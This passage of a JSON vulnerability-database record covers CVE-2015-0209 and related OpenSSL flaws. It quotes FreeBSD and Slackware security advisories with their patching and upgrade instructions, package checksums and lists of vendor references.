- Remote Code Execution\nCVE-2014-8275 - Unauthorized Modification\nCVE-2014-9427 - Remote Disclosure of Information\nCVE-2014-9652 - Remote Denial of Service (DoS)\nCVE-2014-9653 - Remote Denial of Service (DoS)\nCVE-2014-9705 - Remote Code Execution\nCVE-2015-0204 - Remote Disclosure of Information\nCVE-2015-0205 - Remote Unauthorized Access\nCVE-2015-0206 - Remote Denial of Service (DoS)\nCVE-2015-0207 - Remote Denial of Service (DoS)\nCVE-2015-0208 - Remote Denial of Service (DoS)\nCVE-2015-0209 - Remote Denial of Service (DoS)\nCVE-2015-0231 - Remote Denial of Service (DoS)\nCVE-2015-0232 - Remote Denial of Service (DoS), Execution of Arbitrary Code\nCVE-2015-0273 - Remote Execution of Arbitrary Code\nCVE-2015-0285 - Remote Disclosure of Information\nCVE-2015-0286 - Remote Denial of Service (DoS)\nCVE-2015-0287 - Remote Denial of Service (DoS)\nCVE-2015-0288 - Remote Denial of Service (DoS)\nCVE-2015-0289 - Remote Denial of Service (DoS)\nCVE-2015-0290 - Remote Denial of Service (DoS)\nCVE-2015-0291 - Remote Denial of Service (DoS)\nCVE-2015-0292 - Remote Denial of Service (DoS)\nCVE-2015-0293 - Remote Denial of Service (DoS)\nCVE-2015-1787 - Remote Denial of Service (DoS)\nCVE-2015-2301 - Remote Execution of Arbitrary Code\nCVE-2015-2331 - Remote Denial of Service (DoS), Execution of Arbitrary Code\nCVE-2015-2348 - Unauthorized Modification\nCVE-2015-2787 - Remote Execution of Arbitrary Code\nCVE-2015-2134 - Cross-site Request Forgery (CSRF)\nSSRT102109\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-15:06.openssl                                    Security Advisory\n                                                          The FreeBSD Project\n\nTopic:          Multiple OpenSSL vulnerabilities\n\nCategory:       contrib\nModule:         openssl\nAnnounced:      2015-03-19\nAffects:        All supported versions of FreeBSD. \nCorrected:      2015-03-19 17:40:43 UTC (stable/10, 10.1-STABLE)\n                2015-03-19 17:42:38 UTC (releng/10.1, 10.1-RELEASE-p7)\n                2015-03-19 17:40:43 UTC (stable/9, 9.3-STABLE)\n                2015-03-19 17:42:38 UTC (releng/9.3, 9.3-RELEASE-p11)\n                2015-03-19 17:40:43 UTC (stable/8, 8.4-STABLE)\n                2015-03-19 17:42:38 UTC (releng/8.4, 8.4-RELEASE-p25)\nCVE Name:       CVE-2015-0209, CVE-2015-0286, CVE-2015-0287, CVE-2015-0288,\n                CVE-2015-0289, CVE-2015-0293\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\nI.   Background\n\nFreeBSD includes software from the OpenSSL Project.  The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured\nOpen Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nAbstract Syntax Notation One (ASN.1) is a standard and notation that\ndescribes rules and structures for representing, encoding, transmitting,\nand decoding data in telecommunications and computer networking, which\nenables representation of objects that are independent of machine-specific\nencoding technique. \n\nII.  [CVE-2015-0293]\n\nIII.  [CVE-2015-0209]\n\nA remote attacker who is able to send specifically crafted certificates\nmay be able to crash an OpenSSL client or server. [CVE-2015-0287]\n\nAn attacker may be able to crash applications that create a new certificate\nrequest with subject name the same as in an existing, specifically crafted\ncertificate. \n\nIV.  Workaround\n\nNo workaround is available. \n\nV.   Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 8.4 and FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-0.9.8.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-0.9.8.patch.asc\n# gpg --verify openssl-0.9.8.patch.asc\n\n[FreeBSD 10.1]\n# fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-1.0.1.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-1.0.1.patch.asc\n# gpg --verify openssl-1.0.1.patch.asc\n\nb) Apply the patch.  Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\nVI.  Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path                                                      Revision\n- -------------------------------------------------------------------------\nstable/8/                                                         r280266\nreleng/8.4/                                                       r280268\nstable/9/                                                         r280266\nreleng/9.3/                                                       r280268\nstable/10/                                                        r280266\nreleng/10.1/                                                      r280268\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. References\n\n\u003cURL:https://www.openssl.org/news/secadv_20150319.txt\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293\u003e\n\nThe latest revision of this advisory is available at\n\u003cURL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:06.openssl.asc\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.1.2 (FreeBSD)\n\niQIcBAEBCgAGBQJVCwr1AAoJEO1n7NZdz2rnayEP/0w3Pba5k/1G0mJ1T9APNAns\nhhXm0YuR/rNJ1XBooWEOctrijlsVChcIt8KvJCU9apOZWjDvm/nvaQ077GCi5RSp\njhQBs8MLVfXzwMbJ0/uBpp6ChF8uafk5O+gr8ulb2jG6VIaLkGOWPYv61aRYSGxy\nR7+6FxD8M0lLbGOQGETy1HxKzeWztA2p0ILORNAsi+bF8GSJpxGhSxqDDi4+ic/C\n3oEw0zT/E6DhxJovOPebKq0eGcRbv7ETqDmtNQdqbOddV+0FY1E+nHtrAo6B/Kln\nrL+meBJHmLeEREROFk4OvCynuROUJGmXJGKwjN3uOVM05qcEZS4NkVhFNrxt6S5H\nt3wQ02SesbA3pbmce5OuXmlJgdL57DVlMb5sQjkqPeoJ6pn6Rz7VLSgLNfXDUSxs\nx/Lgx0+qLQUubMud7zT97UIvZmDqFTWXfJu5S/0Qt8BPFunmoNJttJ5Cr+brzEtu\n5RLjcvkC1giVCpSXS96QbeT67uqSkMZa8gtII8bA77HBGA0Ky8AOwTAXbCiUovuH\nsLwsI8KUC3lsKUh7eyLsSm2+wRHn0e6dZ1PE0JRazCnCRboTvMWK2d4R7ANdrwsq\nCgtCWLRz6vbB9J4XTNupcEoZGhIA4RuOBqx43eQmaRw1HoV3vn85QP94oL5jzXBd\nUQg3YfrXHDlxCsqEzN7o\n=wi0T\n-----END PGP SIGNATURE-----\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1m-i486-1_slack14.1.txz:  Upgraded. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zf-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zf-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zf-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1m-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1m-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1m-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1m-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1m-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1m-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1m-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1m-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n9ba57b2971962ceb6205ec7b7e6b84e7  openssl-0.9.8zf-i486-1_slack13.0.txz\n706ef57bb71992961584a3d957c5dbcb  openssl-solibs-0.9.8zf-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n5f581b663798eacc8e7df4c292f33dbf  openssl-0.9.8zf-x86_64-1_slack13.0.txz\nfe5f33f4d2db08b4f8d724e62bf6e514  openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n1ef0ba15454da786993361c927084438  openssl-0.9.8zf-i486-1_slack13.1.txz\n2b3e20bcaa77f39512b6edcbc41b5471  openssl-solibs-0.9.8zf-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\nf8fae10a1936cf900d362b65d9b2c8df  openssl-0.9.8zf-x86_64-1_slack13.1.txz\n0093e35c46382eeef03a51421895ed65  openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n7d4dd0f76252c98622a5f5939f6f0674  openssl-0.9.8zf-i486-1_slack13.37.txz\ne5cde01c0773ac78d33964e4107878df  openssl-solibs-0.9.8zf-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n379424e15bd378e00a5ba0c709432429  openssl-0.9.8zf-x86_64-1_slack13.37.txz\n54832ad7e5440ce1c496be47fec9140d  openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\n8abafa33d2bf90b6cd8be849c0d9a643  openssl-1.0.1m-i486-1_slack14.0.txz\nbac56213a540586d801d7b57608396de  openssl-solibs-1.0.1m-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\nb4c6c971e74b678c68671feed18fa7dc  openssl-1.0.1m-x86_64-1_slack14.0.txz\nacac871e22b5de998544c2f6431c0139  openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\nc1f47f1f1ba5a13d6ac2ef2ae48bfb4c  openssl-1.0.1m-i486-1_slack14.1.txz\nb7b1761ae1585f406d303273812043d3  openssl-solibs-1.0.1m-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n1c6e11e2e3454836d5a3e9243f7c7738  openssl-1.0.1m-x86_64-1_slack14.1.txz\n25b7a704816a2123463ddbfabbc1b86d  openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n0926b2429e1326c8ab9bcbbda056dc66  a/openssl-solibs-1.0.1m-i486-1.txz\nb6252d0f141eba7b0a8e8c5bbdc314f0  n/openssl-1.0.1m-i486-1.txz\n\nSlackware x86_64 -current packages:\n99b903f556c7a2d5ec283f04c2f5a650  a/openssl-solibs-1.0.1m-x86_64-1.txz\n9ecb47e0b70bd7f8064c96fb2211c4b7  n/openssl-1.0.1m-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1m-i486-1_slack14.1.txz openssl-solibs-1.0.1m-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-0209"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      },
      {
        "db": "BID",
        "id": "73239"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-0209"
      },
      {
        "db": "PACKETSTORM",
        "id": "133318"
      },
      {
        "db": "PACKETSTORM",
        "id": "131023"
      },
      {
        "db": "PACKETSTORM",
        "id": "130916"
      },
      {
        "db": "PACKETSTORM",
        "id": "130933"
      },
      {
        "db": "PACKETSTORM",
        "id": "133325"
      },
      {
        "db": "PACKETSTORM",
        "id": "132763"
      },
      {
        "db": "PACKETSTORM",
        "id": "130932"
      },
      {
        "db": "PACKETSTORM",
        "id": "131585"
      }
    ],
    "trust": 2.7
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-0209",
        "trust": 3.0
      },
      {
        "db": "JUNIPER",
        "id": "JSA10680",
        "trust": 1.4
      },
      {
        "db": "BID",
        "id": "73239",
        "trust": 1.4
      },
      {
        "db": "SECTRACK",
        "id": "1031929",
        "trust": 1.1
      },
      {
        "db": "MCAFEE",
        "id": "SB10110",
        "trust": 1.1
      },
      {
        "db": "SIEMENS",
        "id": "SSA-412672",
        "trust": 1.1
      },
      {
        "db": "JVN",
        "id": "JVNVU95877131",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001879",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-17-094-04",
        "trust": 0.4
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-0209",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "133318",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "131023",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130916",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130933",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "133325",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132763",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130932",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "131585",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-0209"
      },
      {
        "db": "BID",
        "id": "73239"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      },
      {
        "db": "PACKETSTORM",
        "id": "133318"
      },
      {
        "db": "PACKETSTORM",
        "id": "131023"
      },
      {
        "db": "PACKETSTORM",
        "id": "130916"
      },
      {
        "db": "PACKETSTORM",
        "id": "130933"
      },
      {
        "db": "PACKETSTORM",
        "id": "133325"
      },
      {
        "db": "PACKETSTORM",
        "id": "132763"
      },
      {
        "db": "PACKETSTORM",
        "id": "130932"
      },
      {
        "db": "PACKETSTORM",
        "id": "131585"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0209"
      }
    ]
  },
  "id": "VAR-201503-0052",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.44373096375000004
  },
  "last_update_date": "2024-07-23T20:49:46.592000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005",
        "trust": 0.8,
        "url": "http://lists.apple.com/archives/security-announce/2015/jun/msg00002.html"
      },
      {
        "title": "HT204942",
        "trust": 0.8,
        "url": "http://support.apple.com/en-us/ht204942"
      },
      {
        "title": "HT204942",
        "trust": 0.8,
        "url": "http://support.apple.com/ja-jp/ht204942"
      },
      {
        "title": "cisco-sa-20150320-openssl",
        "trust": 0.8,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150320-openssl"
      },
      {
        "title": "HPSBGN03306 SSRT102007",
        "trust": 0.8,
        "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04626468"
      },
      {
        "title": "\u30a2\u30e9\u30a4\u30c9\u30c6\u30ec\u30b7\u30b9\u682a\u5f0f\u4f1a\u793e\u304b\u3089\u306e\u60c5\u5831",
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu95877131/522154/index.html"
      },
      {
        "title": "NV15-015",
        "trust": 0.8,
        "url": "http://jpn.nec.com/security-info/secinfo/nv15-015.html"
      },
      {
        "title": "Fix a failure to NULL a pointer freed on error.",
        "trust": 0.8,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=1b4a8df38fc9ab3c089ca5765075ee53ec5bd66a"
      },
      {
        "title": "Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/secadv_20150319.txt"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - July 2015",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - January 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - July 2015 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015verbose-2367947.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - January 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016verbose-2367956.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - October 2015",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"
      },
      {
        "title": "Oracle Solaris Third Party Bulletin - January 2015",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html"
      },
      {
        "title": "Bug 1196737",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1196737"
      },
      {
        "title": "OpenSSL Updates of 19 March 2015",
        "trust": 0.8,
        "url": "https://access.redhat.com/articles/1384453"
      },
      {
        "title": "RHSA-2015:0715",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2015-0715.html"
      },
      {
        "title": "RHSA-2015:0716",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2015-0716.html"
      },
      {
        "title": "RHSA-2015:0752",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2015-0752.html"
      },
      {
        "title": "SA92",
        "trust": 0.8,
        "url": "https://bto.bluecoat.com/security-advisory/sa92"
      },
      {
        "title": "October 2015 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update"
      },
      {
        "title": "July 2015 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/july_2015_critical_patch_update"
      },
      {
        "title": "January 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/january_2016_critical_patch_update"
      },
      {
        "title": "TLSA-2015-12",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2015/tlsa-2015-12j.html"
      },
      {
        "title": "OpenSSL\u306b\u8907\u6570\u306e\u8106\u5f31\u6027 (19 Mar 2015)",
        "trust": 0.8,
        "url": "http://www.seil.jp/support/security/a01545.html"
      },
      {
        "title": "cisco-sa-20150320-openssl",
        "trust": 0.8,
        "url": "http://www.cisco.com/cisco/web/support/jp/112/1128/1128874_cisco-sa-20150320-openssl-j.html"
      },
      {
        "title": "Ubuntu Security Notice: openssl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2537-1"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2015-498",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-498"
      },
      {
        "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory"
      },
      {
        "title": "Tenable Security Advisories: [R6] OpenSSL \u002720150319\u0027 Advisory Affects Tenable Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-04"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=2a43c5799a7dd07d6c0a92a3b040d12f"
      },
      {
        "title": "Cisco: Multiple Vulnerabilities in OpenSSL (March 2015) Affecting Cisco Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150320-openssl"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
      },
      {
        "title": "Symantec Security Advisories: SA92 : OpenSSL Security Advisory 19-Mar-2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=07adc2b6f5910b64efc7296f227b9f10"
      },
      {
        "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2015-0209 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-0209"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0209"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.5,
        "url": "https://www.openssl.org/news/secadv_20150319.txt"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
      },
      {
        "trust": 1.4,
        "url": "https://support.citrix.com/article/ctx216642"
      },
      {
        "trust": 1.2,
        "url": "https://security.gentoo.org/glsa/201503-11"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/bid/73239"
      },
      {
        "trust": 1.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1196737"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-march/152844.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-march/152733.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-march/152734.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2015/dsa-3197"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-03/msg00062.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15%3a06.openssl.asc"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00022.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2537-1"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1031929"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0716.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:063"
      },
      {
        "trust": 1.1,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062"
      },
